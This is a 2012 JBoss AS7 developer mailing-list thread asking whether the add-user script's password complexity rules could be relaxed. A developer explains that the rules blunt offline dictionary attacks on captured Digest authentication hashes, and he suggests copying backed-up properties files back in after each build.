[jboss-as7-dev] Relaxing password requirements for add-user script?
Jaikiran Pai
jpai at redhat.com
Wed Oct 10 06:11:32 EDT 2012
On Wednesday 10 October 2012 03:20 PM, Darran Lofthouse wrote:
> Would also add for those working on this day to day there is nothing
> to stop you backing up your properties files and just copying them
> back in after a build - it is not really necessary to be running
> through the add user process.
>
That's a good point! I'll happily use this trick.
-Jaikiran
> Regards,
> Darran Lofthouse.
>
>
> On 10/10/2012 10:47 AM, Darran Lofthouse wrote:
>> On 10/10/2012 08:23 AM, Jaikiran Pai wrote:
>>> I never have
>>> understood this specific requirement of passwords being forced to be of
>>> certain type (many sites do it).
>>
>> The reason for the requirement is to reduce the effectiveness of
>> dictionary based attacks by stopping the users from using commonly used
>> words for their password.
>>
>> For Digest authentication which we are using by default the password is
>> not transmitted in the clear - however a hash is transmitted and apart
>> from the password used to generate the hash the rest of the information
>> used to generate the hash is also visible.
>>
>> At this point if you want to discover the users password you can try
>> brute force regenerating the hashes by trying out one candidate password
>> after another - passwords could be anything so this is a big task,
>> however if most users are just going to pick a normal word or a name or
>> something common like that you have a much smaller sample to use to
>> discover their password by trying each entry in the smaller sample.
>>
>> This brute force discovery of a password occurs offline and only
>> requires the hashes from the captured packets so we can't detect that it
>> is happening so instead a policy is in place to ensure more complex
>> passwords are chosen - this way the brute force discovery has a much
>> larger sample of passwords.
>>
>> Ideally SSL/TLS would still be enabled for these connections which would
>> prevent even the hashes being seen but compared to BASIC authentication
>> where capturing one packet gets you the users password this is a step up
>> as an intermediate step.
>>
>>> I'm not a security expert, but is this "your password has to have upper
>>> case, lower case, digit, special char" requirement really worth it in a
>>> real application?
>>>
>>>
>>> [1]
>>> https://issues.jboss.org/browse/AS7-2756?focusedCommentId=12653165&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-12653165
>>>
>>>
>>> -Jaikiran
>>> _______________________________________________
>>> jboss-as7-dev mailing list
>>> jboss-as7-dev at lists.jboss.org
>>> https://lists.jboss.org/mailman/listinfo/jboss-as7-dev
>>>
>> _______________________________________________
>> jboss-as7-dev mailing list
>> jboss-as7-dev at lists.jboss.org
>> https://lists.jboss.org/mailman/listinfo/jboss-as7-dev
>>
More information about the jboss-as7-dev
mailing list